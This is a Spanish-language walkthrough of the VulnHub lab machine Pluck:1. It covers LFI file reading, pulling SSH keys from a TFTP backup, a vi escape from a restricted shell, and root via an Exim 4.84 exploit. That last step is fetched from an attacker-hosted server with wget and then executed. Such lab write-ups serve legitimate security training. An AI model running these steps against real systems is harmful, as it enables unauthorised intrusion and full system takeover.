🚀 Máquina Pluck:1 - VulnHub Walkthrough
📝 Teoría
¿Qué vamos a explotar?
En esta máquina encontramos una combinación de vulnerabilidades típicas:
- Local File Inclusion (LFI) con Tecnica Wrapper
- Backup inseguro accesible via tftp
- SSH con claves privadas expuestas
- Escalada de privilegios mediante exploit de exim
🛠️ Práctica: Walkthrough Completo
1. Reconocimiento inicial
URL vulnerable detectada
http://localhost/index.php?page=admin.phpEsto nos permite jugar con Tecnica Wrapper
Explotando LFI para leer archivos
# Leer /etc/passwd
http://localhost/index.php?page=/etc/passwdDescubrimiento del archivo backup.sh

Contenido del archivo:

Información clave
El script revela que hace backups en el directorio
backupsy que podemos obtenerlos via tftp.
2. Extracción de archivos via TFTP
Descargar el backup
# Conectar al servidor TFTP y descargar backup
tftp <target_ip>
tftp> get backups/backup.tar.gz
tftp> quitDescomprimir y analizar
tar -xf backups/backup.tar.gzContenido del backup
Al descomprimirlo encontramos directorios con claves SSH públicas y privadas.
3. Acceso SSH con clave privada
Usar la clave encontrada
ssh paul@192.168.111.46 -i id_key4Restricción detectada
El usuario
paultiene/home/paul:/usr/bin/pdmenucomo shell, lo que restringe las acciones disponibles.
4. Bypass de pdmenu y obtención de shell
Escapar de pdmenu usando vi
En el menú pdmenu hay una opción edit file. Al seleccionarla:
- Abrimos
/etc/passwd - Esto nos da acceso a vi
- Consultamos GTFOBins para escapar de vi
Ejecutar escape via GTFOBins
# Dentro de vi, ejecutar:
:set shell=/bin/bash
:shellMejorar la terminal
export TERM=xterm5. Escalada de privilegios
Reconocimiento post-explotación
Aplicamos técnicas de Post Explotacion - Linux:
# Ver información del usuario
id
# Información del sistema
cat /etc/os-release
uname -a
# Buscar binarios SUID
find / -perm -4000 2>/dev/nullDescubrimiento de Exim vulnerable
# Encontramos: /usr/exim/bin/exim-4.84-7
ls -la /usr/exim/bin/exim-4.84-7Este es el servicio exim versión 4.84-7.
6. Explotación de Exim
Buscar exploits disponibles
searchsploit exim 4.84Resultado:
------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
Exploit Title | Path
------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
Exim - 'perl_startup' Local Privilege Escalation (Metasploit) | linux/local/39702.rb
Exim 4.84-3 - Local Privilege Escalation | linux/local/39535.sh
Exim < 4.86.2 - Local Privilege Escalation | linux/local/39549.txt
Exim < 4.90.1 - 'base64d' Remote Code Execution | linux/remote/44571.py
PHPMailer < 5.2.20 with Exim MTA - Remote Code Execution | php/webapps/42221.py
------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
Usar el exploit 39535.sh
En la máquina atacante:
# Descargar el exploit
searchsploit -m linux/local/39535.sh
# Crear servidor HTTP
python3 -m http.server 80En la máquina vulnerable:
# Descargar el exploit
wget http://ip_del_atacante/39535.sh
# Dar permisos de ejecución
chmod +x 39535.sh
# Ejecutar exploit
./39535.sh¡Root obtenido!
El exploit aprovecha una vulnerabilidad en Exim 4.84-7 para obtener privilegios de root.
🗺️ Diagrama de flujo del ataque
flowchart TD A[Reconocimiento web] --> B[LFI detectado] B --> C[Leer backup.sh] C --> D[Descargar backup via TFTP] D --> E[Extraer claves SSH] E --> F[Acceso SSH como paul] F --> G[Bypass de pdmenu con vi] G --> H[Shell como paul] H --> I[Enumeración post-explotación] I --> J[Exim 4.84-7 vulnerable] J --> K[Exploit de escalada] K --> L[ROOT OBTENIDO]
📋 Resumen de técnicas utilizadas
| Fase | Técnica | Herramienta/Método |
|---|---|---|
| Reconocimiento | LFI + File Reading | Tecnica Wrapper |
| Exfiltración | Descarga de archivos | tftp |
| Acceso inicial | Autenticación con clave | SSH + clave privada |
| Bypass | Escape de shell restringida | GTFOBins + vi |
| Escalada | Local Privilege Escalation | Exploit exim 4.84-7 |
🛡️ Lecciones aprendidas
Vectores de ataque identificados
- LFI sin sanitización permite leer archivos del sistema
- TFTP expuesto facilita la exfiltración de backups
- Claves SSH en backups comprometen la autenticación
- Shells restringidas pueden ser bypasseadas con GTFOBins
- Servicios desactualizados como Exim son vectores de escalada
¡Máquina comprometida exitosamente!
Esta máquina es excelente para practicar múltiples vectores de ataque y técnicas de post-explotación.